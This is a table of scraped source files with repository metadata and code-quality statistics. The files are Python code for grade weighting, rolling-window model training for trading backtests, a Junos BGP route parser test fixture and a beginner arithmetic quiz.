hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1091dc613a4b1ba2a0d7987a53756d6b820a4250
| 2,257
|
py
|
Python
|
modules/weight/top_grades.py
|
u-keisuke/UT_calculator
|
f708e9dc76b824c751ca35285bf9194f49bd543f
|
[
"MIT"
] | null | null | null |
modules/weight/top_grades.py
|
u-keisuke/UT_calculator
|
f708e9dc76b824c751ca35285bf9194f49bd543f
|
[
"MIT"
] | null | null | null |
modules/weight/top_grades.py
|
u-keisuke/UT_calculator
|
f708e9dc76b824c751ca35285bf9194f49bd543f
|
[
"MIT"
] | null | null | null |
#series系列の成績上位x単位分の重率をwに変更するということ
def top_grades_series(s_dict, series, credits, w):
s_dict_name_series = {}
#seriesで指定された系列をs_dict内から抽出したもの
array = []
for s in series:
#辞書要素に、既にあるpoint, credit, weightに加えて、seriesを追加
for name in s_dict[s].keys():
s_dict_name_series[name] = s
array += list(s_dict[s].items())
array = sorted(array, key=lambda x:x[1]["point"], reverse=True)
for i in range(len(array)):
if credits <= 0:
break
else:
#その科目の名前
name = array[i][0]
#その科目の系列
s = s_dict_name_series[name]
credit = array[i][1]["credit"]
if credit <= credits:
modified_weight = w
else:
modified_weight = float( (credits*w + (credit-credits)*w*0.1) / credit )
s_dict[s][name]["weight"] = modified_weight
#print(name, credit, credits, modified_weight)
credits -= credit
return s_dict
#names内の成績上位x単位分の重率をwに変更するということ
def top_grades_name(s_dict, names, credits, w):
s_dict_name_series = {}
#seriesで指定された系列をs_dict内から抽出したもの
array = []
for s in s_dict.keys():
#辞書要素に、既にあるpoint, credit, weightに加えて、seriesを追加
for name in s_dict[s].keys():
for n in names:
if name in n:
s_dict_name_series[name] = s
array += list({name: s_dict[s][name]}.items())
array = sorted(array, key=lambda x:x[1]["point"], reverse=True)
for i in range(len(array)):
if credits <= 0:
break
else:
#その科目の名前
name = array[i][0]
#その科目の系列
s = s_dict_name_series[name]
credit = array[i][1]["credit"]
if credit <= credits:
modified_weight = w
else:
modified_weight = float( (credits*w + (credit-credits)*w*0.1) / credit )
s_dict[s][name]["weight"] = modified_weight
#print(name, credit, credits, modified_weight)
credits -= credit
return s_dict
| 30.5
| 88
| 0.515286
| 252
| 2,257
| 4.444444
| 0.190476
| 0.075893
| 0.048214
| 0.080357
| 0.846429
| 0.846429
| 0.846429
| 0.846429
| 0.794643
| 0.794643
| 0
| 0.008541
| 0.377492
| 2,257
| 74
| 89
| 30.5
| 0.788612
| 0.146212
| 0
| 0.826087
| 0
| 0
| 0.017745
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043478
| false
| 0
| 0
| 0
| 0.086957
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
52f4038429d70f3082fa0facf8c687c160a1642a
| 10,806
|
py
|
Python
|
src/ml/cl_training.py
|
lderoose/backtesting-trading-strategy
|
72135bf8ace5899eeaded9ae77c7578d412aa831
|
[
"MIT"
] | null | null | null |
src/ml/cl_training.py
|
lderoose/backtesting-trading-strategy
|
72135bf8ace5899eeaded9ae77c7578d412aa831
|
[
"MIT"
] | null | null | null |
src/ml/cl_training.py
|
lderoose/backtesting-trading-strategy
|
72135bf8ace5899eeaded9ae77c7578d412aa831
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3.8
import numpy as np
import pandas as pd
from tqdm import tqdm
from cl_features_importances import FeatureImportances
class WindowTrainingSpec:
"""
relevant to use WindowTrainingSpec instead WindowTraining if labels are computed with cl_labelling.Labelling.
"""
def __init__(self, size_window, refit_fqz):
if isinstance(size_window, int):
if size_window > 1:
self.size_window = size_window
else:
raise ValueError("parameter size_window must be greater than 1.")
else:
raise TypeError(f"expected type int for size_window parameter, get {type(size_window)} instead.")
if isinstance(refit_fqz, int):
if refit_fqz > 0:
self.refit_fqz = refit_fqz
else:
raise ValueError("parameter refit_fqz must be greater than 0.")
else:
raise TypeError(f"expected type int for refit_fqz parameter, get {type(refit_fqz)} instead.")
def _compute_lag(self, idx, index_knowledge):
for lag in range(1, idx, 1):
b_inf = max(0, idx - lag - self.size_window)
vector = index_knowledge[b_inf:(idx-lag)]
if np.max(vector) <= idx:
break
return lag
def fit_predict(self, model, X, y, index_knowledge, sample_weight=None, fit_or_refit="fit", predict_proba=True, accumulate_window=False,
get_feat_imp=False):
"""
1 - fit (or refit) a model on last n data,
2 - predict until next fitting
3 - fit (or refit) a model on last n data
4 - ...
Parameters
----------
model : supported model
must have a .fit method
X : pandas.DataFrame
features
y : numpy.ndarray
labels
index_knowledge : numpy.ndarray
at what time label can be guess
sample_weight : numpy.ndarray, optional
vector of weights for each row, by default None means equal for each rows.
fit_or_refit : str, optional
fit if next predictions will be make with a new model or refit if next predictions will be make with the same model fitted
on new data, by default "fit".
predict_proba : bool, optional
by default True
accumulate_window : bool, optional
new data = old_data + new_data ? or new_data = new_data, by default False
get_feat_imp : bool, optional
provide dict of features importances (sum of abs(importances) of each model), by default False
Returns
-------
pandas.DataFrame or pandas.DataFrame and dict (if get_feat_imp == True)
predictions
Raises
------
ValueError
fit_or_refit != 'fit' or 'refit'.
"""
if get_feat_imp:
dic_imp = {}
if predict_proba:
preds = np.empty(shape=(len(X)-self.size_window, 2), dtype=np.float64)
else:
preds = np.empty(shape=len(X)-self.size_window, dtype=np.float64)
if sample_weight is None:
sample_weight = np.ones(shape=len(X), dtype=np.uint64)
for i, j in enumerate(tqdm(range(self.size_window, len(X), self.refit_fqz))):
lag = self._compute_lag(j, index_knowledge)
if fit_or_refit == "fit":
model_unfit = model
if accumulate_window:
model_fitted = model_unfit.fit(
X[:(j-lag)],
y[:(j-lag)],
sample_weight[:(j-lag)]
)
else:
b_inf = max(0, j - lag - self.size_window)
model_fitted = model_unfit.fit(
X[b_inf:(j-lag)],
y[b_inf:(j-lag)],
sample_weight[b_inf:(j-lag)]
)
elif fit_or_refit == "refit":
if i == 0:
model_fitted = model
if accumulate_window:
model_fitted = model_fitted.fit(
X[:(j-lag)],
y[:(j-lag)],
sample_weight[:(j-lag)]
)
else:
b_inf = max(0, j - lag - self.size_window)
model_fitted = model_fitted.fit(
X[b_inf:(j-lag)],
y[b_inf:(j-lag)],
sample_weight[b_inf:(j-lag)]
)
else:
raise ValueError("parameter fit_or_refit must be 'fit' or 'refit'.")
start = i*self.refit_fqz
stop = self.refit_fqz + i*self.refit_fqz
if get_feat_imp:
dic_imp_tmp = FeatureImportances.compute(model_fitted, X.columns.tolist(), reverse=False, mode_abs=True)
if dic_imp:
dic_imp = FeatureImportances.accumulate_dic_imp(dic_imp, dic_imp_tmp)
else:
dic_imp = dic_imp_tmp
if predict_proba:
preds[start:stop, :] = model_fitted.predict_proba(X[j:j+self.refit_fqz])
else:
preds[start:stop] = model_fitted.predict(X[j:j+self.refit_fqz])
preds = pd.DataFrame(preds, index=X.index[self.size_window:])
if get_feat_imp:
dic_imp = dict(sorted(dic_imp.items(), key=lambda x: x[1], reverse=True)) # sort by values
return preds, dic_imp
else:
return preds
class WindowTraining:
def __init__(self, size_window, refit_fqz):
if isinstance(size_window, int):
if size_window > 1:
self.size_window = size_window
else:
raise ValueError("parameter size_window must be greater than 1.")
else:
raise TypeError(f"expected type int for size_window parameter, get {type(size_window)} instead.")
if isinstance(refit_fqz, int):
if refit_fqz > 0:
self.refit_fqz = refit_fqz
else:
raise ValueError("parameter refit_fqz must be greater than 0.")
else:
raise TypeError(f"expected type int for refit_fqz parameter, get {type(refit_fqz)} instead.")
def fit_predict(self, model, X, y, sample_weight=None, fit_or_refit="fit", predict_proba=True, accumulate_window=False,
get_feat_imp=False):
"""
1 - fit (or refit) a model on last n data,
2 - predict until next fitting
3 - fit (or refit) a model on last n data
4 - ...
Parameters
----------
model : supported model
must have a .fit method
X : pandas.DataFrame
features
y : numpy.ndarray
labels
sample_weight : numpy.ndarray, optional
vector of weights for each row, by default None means equal for each rows.
fit_or_refit : str, optional
fit if next predictions will be make with a new model or refit if next predictions will be make with the same model fitted
on new data, by default "fit".
predict_proba : bool, optional
by default True
accumulate_window : bool, optional
new data = old_data + new_data ? or new_data = new_data, by default False
get_feat_imp : bool, optional
provide dict of features importances (sum of abs(importances) of each model), by default False
Returns
-------
pandas.DataFrame or pandas.DataFrame and dict (if get_feat_imp == True)
predictions
Raises
------
ValueError
fit_or_refit != 'fit' or 'refit'.
"""
if get_feat_imp:
dic_imp = {}
if predict_proba:
preds = np.empty(shape=(len(X)-self.size_window, 2), dtype=np.float64)
else:
preds = np.empty(shape=len(X)-self.size_window, dtype=np.float64)
if sample_weight is None:
sample_weight = np.ones(shape=len(X), dtype=np.uint64)
for i, j in enumerate(tqdm(range(self.size_window, len(X), self.refit_fqz))):
if fit_or_refit == "fit":
model_unfit = model
if accumulate_window:
model_fitted = model_unfit.fit(
X[:j],
y[:j],
sample_weight[:j]
)
else:
model_fitted = model_unfit.fit(
X[j-self.size_window:j],
y[j-self.size_window:j],
sample_weight[j-self.size_window:j]
)
elif fit_or_refit == "refit":
if i == 0:
model_fitted = model
if accumulate_window:
model_fitted = model_fitted.fit(
X[:j],
y[:j],
sample_weight[:j]
)
else:
model_fitted = model_fitted.fit(
X[j-self.size_window:j],
y[j-self.size_window:j],
sample_weight[j-self.size_window:j]
)
else:
raise ValueError("parameter fit_or_refit must be 'fit' or 'refit'.")
start = i*self.refit_fqz
stop = self.refit_fqz + i*self.refit_fqz
if get_feat_imp:
dic_imp_tmp = FeatureImportances.compute(model_fitted, X.columns.tolist(), reverse=False, mode_abs=True)
if dic_imp:
dic_imp = FeatureImportances.accumulate_dic_imp(dic_imp, dic_imp_tmp)
else:
dic_imp = dic_imp_tmp
if predict_proba:
preds[start:stop, :] = model_fitted.predict_proba(X[j:j+self.refit_fqz])
else:
preds[start:stop] = model_fitted.predict(X[j:j+self.refit_fqz])
preds = pd.DataFrame(preds, index=X.index[self.size_window:])
if get_feat_imp:
dic_imp = dict(sorted(dic_imp.items(), key=lambda x: x[1], reverse=True)) # sort by values
return preds, dic_imp
else:
return preds
| 39.582418
| 140
| 0.514992
| 1,260
| 10,806
| 4.22381
| 0.126984
| 0.062007
| 0.055242
| 0.018038
| 0.909245
| 0.909245
| 0.909245
| 0.896655
| 0.896655
| 0.896655
| 0
| 0.006336
| 0.401166
| 10,806
| 272
| 141
| 39.727941
| 0.816103
| 0.211827
| 0
| 0.855422
| 0
| 0
| 0.074651
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03012
| false
| 0
| 0.048193
| 0
| 0.120482
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5e35ed7baaf24d8bb0a2294e03a78cdd0dba6d82
| 6,938
|
py
|
Python
|
src/genie/libs/parser/junos/tests/ShowRouteReceiveProtocolPeerAddressExtensive/cli/equal/golden_output_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 204
|
2018-06-27T00:55:27.000Z
|
2022-03-06T21:12:18.000Z
|
src/genie/libs/parser/junos/tests/ShowRouteReceiveProtocolPeerAddressExtensive/cli/equal/golden_output_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 468
|
2018-06-19T00:33:18.000Z
|
2022-03-31T23:23:35.000Z
|
src/genie/libs/parser/junos/tests/ShowRouteReceiveProtocolPeerAddressExtensive/cli/equal/golden_output_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 309
|
2019-01-16T20:21:07.000Z
|
2022-03-30T12:56:41.000Z
|
expected_output = {
"route-information": {
"route-table": [
{
"active-route-count": "16",
"destination-count": "16",
"hidden-route-count": "0",
"holddown-route-count": "0",
"rt": [
{
"rt-announced-count": "1",
"rt-destination": "10.1.0.0",
"rt-entry": {
"as-path": "AS path: I",
"bgp-path-attributes": {
"attr-as-path-effective": {
"aspath-effective-string": "AS path:",
"attr-value": "I",
}
},
"bgp-rt-flag": "Accepted",
"local-preference": "100",
"nh": {"to": "10.64.4.4"},
},
"rt-entry-count": {"#text": "2"},
"rt-prefix-length": "24",
},
{
"rt-announced-count": "1",
"rt-destination": "10.64.4.4",
"rt-entry": {
"as-path": "AS path: I",
"bgp-path-attributes": {
"attr-as-path-effective": {
"aspath-effective-string": "AS path:",
"attr-value": "I",
}
},
"bgp-rt-flag": "Accepted",
"local-preference": "100",
"nh": {"to": "10.64.4.4"},
},
"rt-entry-count": {"#text": "2"},
"rt-prefix-length": "32",
},
{
"rt-announced-count": "1",
"rt-destination": "10.145.0.0",
"rt-entry": {
"as-path": "AS path: I",
"bgp-path-attributes": {
"attr-as-path-effective": {
"aspath-effective-string": "AS path:",
"attr-value": "I",
}
},
"bgp-rt-flag": "Accepted",
"local-preference": "100",
"nh": {"to": "10.64.4.4"},
},
"rt-entry-count": {"#text": "2"},
"rt-prefix-length": "24",
},
{
"active-tag": "* ",
"rt-announced-count": "1",
"rt-destination": "192.168.220.0",
"rt-entry": {
"as-path": "AS path: I",
"bgp-path-attributes": {
"attr-as-path-effective": {
"aspath-effective-string": "AS path:",
"attr-value": "I",
}
},
"bgp-rt-flag": "Accepted",
"local-preference": "100",
"nh": {"to": "10.64.4.4"},
},
"rt-entry-count": {"#text": "1"},
"rt-prefix-length": "24",
},
{
"active-tag": "* ",
"rt-announced-count": "1",
"rt-destination": "192.168.240.0",
"rt-entry": {
"as-path": "AS path: 200000 4 5 6 I",
"bgp-path-attributes": {
"attr-as-path-effective": {
"aspath-effective-string": "AS path:",
"attr-value": "200000 4 5 6 I",
}
},
"bgp-rt-flag": "Accepted",
"local-preference": "100",
"nh": {"to": "10.64.4.4"},
},
"rt-entry-count": {"#text": "1"},
"rt-prefix-length": "24",
},
{
"active-tag": "* ",
"rt-announced-count": "1",
"rt-destination": "192.168.205.0",
"rt-entry": {
"as-path": "AS path: 200000 4 7 8 I",
"bgp-path-attributes": {
"attr-as-path-effective": {
"aspath-effective-string": "AS path:",
"attr-value": "200000 4 7 8 I",
}
},
"bgp-rt-flag": "Accepted",
"local-preference": "100",
"nh": {"to": "10.64.4.4"},
},
"rt-entry-count": {"#text": "1"},
"rt-prefix-length": "24",
},
{
"active-tag": "* ",
"rt-announced-count": "1",
"rt-destination": "192.168.115.0",
"rt-entry": {
"as-path": "AS path: 200000 4 100000 8 I",
"bgp-path-attributes": {
"attr-as-path-effective": {
"aspath-effective-string": "AS path:",
"attr-value": "200000 4 100000 8 I",
}
},
"bgp-rt-flag": "Accepted",
"local-preference": "100",
"nh": {"to": "10.64.4.4"},
},
"rt-entry-count": {"#text": "1"},
"rt-prefix-length": "24",
},
],
"table-name": "inet.0",
"total-route-count": "19",
},
{
"active-route-count": "18",
"destination-count": "18",
"hidden-route-count": "0",
"holddown-route-count": "0",
"table-name": "inet6.0",
"total-route-count": "20",
},
]
}
}
| 44.76129
| 74
| 0.261603
| 463
| 6,938
| 3.917927
| 0.136069
| 0.092613
| 0.022051
| 0.026461
| 0.892503
| 0.892503
| 0.880375
| 0.827453
| 0.787762
| 0.743109
| 0
| 0.082828
| 0.596281
| 6,938
| 154
| 75
| 45.051948
| 0.564798
| 0
| 0
| 0.551948
| 0
| 0
| 0.300375
| 0.045402
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
eaaa4789cc60f602e523c07bec99ee2e935994f9
| 11,708
|
py
|
Python
|
Maths quiz Complete.py
|
LukiaMcA/Bridging-CS
|
02bdb7354452078b51c76b1ba9d95bc32235cff7
|
[
"Apache-2.0"
] | null | null | null |
Maths quiz Complete.py
|
LukiaMcA/Bridging-CS
|
02bdb7354452078b51c76b1ba9d95bc32235cff7
|
[
"Apache-2.0"
] | null | null | null |
Maths quiz Complete.py
|
LukiaMcA/Bridging-CS
|
02bdb7354452078b51c76b1ba9d95bc32235cff7
|
[
"Apache-2.0"
] | null | null | null |
import random
score = 0
print("Welecome to my fill in Maths quiz!")
#enter topic symbol to define quiz questions
PlayAgain = True
while PlayAgain == True:
Subject = False
while Subject == False:
Topic = input("please enter either +, -, / or * to choose the certain topic: ")
if Topic == "+":
Subject = "Addition"
elif Topic == "-":
Subject = "Subtraction"
elif Topic == "*":
Subject = "Multiplication"
elif Topic == "/":
Subject = "Division"
else:
print("Please enter a correct topic")
Subject == True
#choose the difficulty
Quiz_Range = False
while Quiz_Range == False:
Difficulty = input("Please enter your difficulty out of easy, medium or hard: ").lower()
if Difficulty == "easy":
Quiz_Range = (1 < 10)
elif Difficulty == "medium":
Quiz_Range = (1<50)
elif Difficulty == "hard":
Quiz_Range = (1<100)
else:
print("Please enter a Difficulty")
Quiz_Range == True
print("You have choosen "+Subject+" on "+Difficulty+" Difficulty")
#generating the questions-Addition
if Difficulty == "easy":
low = 1
high = 10
elif Difficulty == "medium":
low = 1
high = 50
elif Difficulty == "hard":
low = 1
high = 100
if Difficulty == "easy" and Subject == "Addition":
Sum1 = random.randint(low, high)
Sum2 = random.randint(low, high)
Sum3 = (Sum1 + Sum2)
Sum4 = int(input("What is " + str(Sum1) + " + " + str(Sum2) + ": "))
if Sum4 == Sum3:
print("Answer is correct!")
score = score+1
print(score)
else:
print("Answer is incorrect!")
print(score)
PlayAgain = input("Do you want to play again?: ")
if PlayAgain == "yes":
PlayAgain = True
elif PlayAgain == "no":
PlayAgain = False
else:
break
if Difficulty == "medium" and Subject == "Addition":
Sum1 = random.randint(low, high)
Sum2 = random.randint(low, high)
Sum3 = (Sum1 + Sum2)
Sum4 = int(input("What is " + str(Sum1) + " + " + str(Sum2) + ": "))
if Sum4 == Sum3:
print("Answer is correct!")
score = score+1
print(score)
else:
print("Answer is incorrect!")
print(score)
PlayAgain = input("Do you want to play again?: ")
if PlayAgain == "yes":
PlayAgain = True
elif PlayAgain == "no":
PlayAgain = False
else:
break
if Difficulty == "hard" and Subject == "Addition":
Sum1 = random.randint(low, high)
Sum2 = random.randint(low, high)
Sum3 = (Sum1 + Sum2)
Sum4 = int(input("What is " + str(Sum1) + " + " + str(Sum2) + ": "))
if Sum4 == Sum3:
print("Answer is correct!")
score = score+1
print(score)
else:
print("Answer is incorrect!")
print(score)
PlayAgain = input("Do you want to play again?: ")
if PlayAgain == "yes":
PlayAgain = True
elif PlayAgain == "no":
PlayAgain = False
else:
break
#SUBTRACTION
if Difficulty == "easy" and Subject == "Subtraction":
Sum1 = random.randint(low, high)
Sum2 = random.randint(low, high)
Sum3 = (Sum1 - Sum2)
Sum4 = int(input("What is " + str(Sum1) + " - " + str(Sum2) + ": "))
if Sum4 == Sum3:
print("Answer is correct!")
score = score+1
print(score)
else:
print("Answer is incorrect!")
print(score)
PlayAgain = input("Do you want to play again?: ")
if PlayAgain == "yes":
PlayAgain = True
elif PlayAgain == "no":
PlayAgain = False
else:
break
if Difficulty == "medium" and Subject == "Subtraction":
Sum1 = random.randint(low, hign)
Sum2 = random.randint(low, high)
Sum3 = (Sum1 - Sum2)
Sum4 = int(input("What is " + str(Sum1) + " - " + str(Sum2) + ": "))
if Sum4 == Sum3:
print("Answer is correct!")
score = score+1
print(score)
else:
print("Answer is incorrect!")
print(score)
PlayAgain = input("Do you want to play again?: ")
if PlayAgain == "yes":
PlayAgain = True
elif PlayAgain == "no":
PlayAgain = False
else:
break
if Difficulty == "hard" and Subject == "Subtraction":
Sum1 = random.randint(low, high)
Sum2 = random.randint(low, high)
Sum3 = (Sum1 - Sum2)
Sum4 = int(input("What is " + str(Sum1) + " - " + str(Sum2) + ": "))
if Sum4 == Sum3:
print("Answer is correct!")
score = score+1
print(score)
else:
print("Answer is incorrect!")
print(score)
PlayAgain = input("Do you want to play again?: ")
if PlayAgain == "yes":
PlayAgain = True
elif PlayAgain == "no":
PlayAgain = False
else:
break
#Multiplication
if Difficulty == "easy" and Subject == "Multiplication":
Sum1 = random.randint(low, high)
Sum2 = random.randint(low, high)
Sum3 = (Sum1 * Sum2)
Sum4 = int(input("What is " + str(Sum1) + " X " + str(Sum2) + ": "))
if Sum4 == Sum3:
print("Answer is correct!")
score = score+1
print(score)
else:
print("Answer is incorrect!")
print(score)
PlayAgain = input("Do you want to play again?: ")
if PlayAgain == "yes":
PlayAgain = True
elif PlayAgain == "no":
PlayAgain = False
else:
break
if Difficulty == "medium" and Subject == "Multiplication":
Sum1 = random.randint(low, high)
Sum2 = random.randint(low, high)
Sum3 = (Sum1 * Sum2)
Sum4 = int(input("What is " + str(Sum1) + " X " + str(Sum2) + ": "))
if Sum4 == Sum3:
print("Answer is correct!")
score = score+1
print(score)
else:
print("Answer is incorrect!")
print(score)
PlayAgain = input("Do you want to play again?: ")
if PlayAgain == "yes":
PlayAgain = True
elif PlayAgain == "no":
PlayAgain = False
else:
break
if Difficulty == "hard" and Subject == "Multiplication":
Sum1 = random.randint(low, high)
Sum2 = random.randint(low, high)
Sum3 = (Sum1 * Sum2)
Sum4 = int(input("What is " + str(Sum1) + " X " + str(Sum2) + ": "))
if Sum4 == Sum3:
print("Answer is correct!")
score = score+1
print(score)
else:
print("Answer is incorrect!")
print(score)
PlayAgain = input("Do you want to play again?: ")
if PlayAgain == "yes":
PlayAgain = True
elif PlayAgain == "no":
PlayAgain = False
else:
break
#Division
if Difficulty == "medium" and Subject == "Multiplication":
Sum1 = random.randint(low, high)
Sum2 = random.randint(low, high)
Sum3 = (Sum1 * Sum2)
Sum4 = int(input("What is " + str(Sum1) + " X " + str(Sum2) + ": "))
if Sum4 == Sum3:
print("Answer is correct!")
score = score+1
print(score)
else:
print("Answer is incorrect!")
print(score)
PlayAgain = input("Do you want to play again?: ")
if PlayAgain == "yes":
PlayAgain = True
elif PlayAgain == "no":
PlayAgain = False
else:
break
if Difficulty == "easy" and Subject == "Division":
Sum1 = random.randint(low, high)
Sum2 = random.randint(low, high)
Sum3 = (Sum1 / Sum2)
Sum4 = int(input("What is " + str(Sum1) + " Divided by " + str(Sum2) + ": "))
if Sum4 == Sum3:
print("Answer is correct!")
score = score+1
print(score)
else:
print("Answer is incorrect!")
print(score)
PlayAgain = input("Do you want to play again?: ")
if PlayAgain == "yes":
PlayAgain = True
elif PlayAgain == "no":
PlayAgain = False
else:
break
if Difficulty == "medium" and Subject == "Division":
Sum1 = random.randint(low, high)
Sum2 = random.randint(low, high)
Sum3 = (Sum1 / Sum2)
Sum4 = int(input("What is " + str(Sum1) + " Divided by " + str(Sum2) + ": "))
if Sum4 == Sum3:
print("Answer is correct!")
score = score+1
print(score)
else:
print("Answer is incorrect!")
print(score)
PlayAgain = input("Do you want to play again?: ")
if PlayAgain == "yes":
PlayAgain = True
elif PlayAgain == "no":
PlayAgain = False
else:
break
if Difficulty == "hard" and Subject == "Division":
Sum1 = random.randint(low, high)
Sum2 = random.randint(low, high)
Sum3 = (Sum1 / Sum2)
Sum4 = int(input("What is " + str(Sum1) + " Divided by " + str(Sum2) + ": "))
if Sum4 == Sum3:
print("Answer is correct!")
score = score+1
print(score)
else:
print("Answer is incorrect!")
print(score)
PlayAgain = input("Do you want to play again?: ")
if PlayAgain == "yes":
PlayAgain = True
elif PlayAgain == "no":
PlayAgain = False
else:
break
| 39.026667
| 97
| 0.421165
| 1,035
| 11,708
| 4.758454
| 0.078261
| 0.068629
| 0.084467
| 0.101523
| 0.846294
| 0.827208
| 0.827208
| 0.820914
| 0.820914
| 0.820914
| 0
| 0.026567
| 0.472754
| 11,708
| 299
| 98
| 39.157191
| 0.771262
| 0.011104
| 0
| 0.857639
| 0
| 0
| 0.144695
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.003472
| 0
| 0.003472
| 0.194444
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
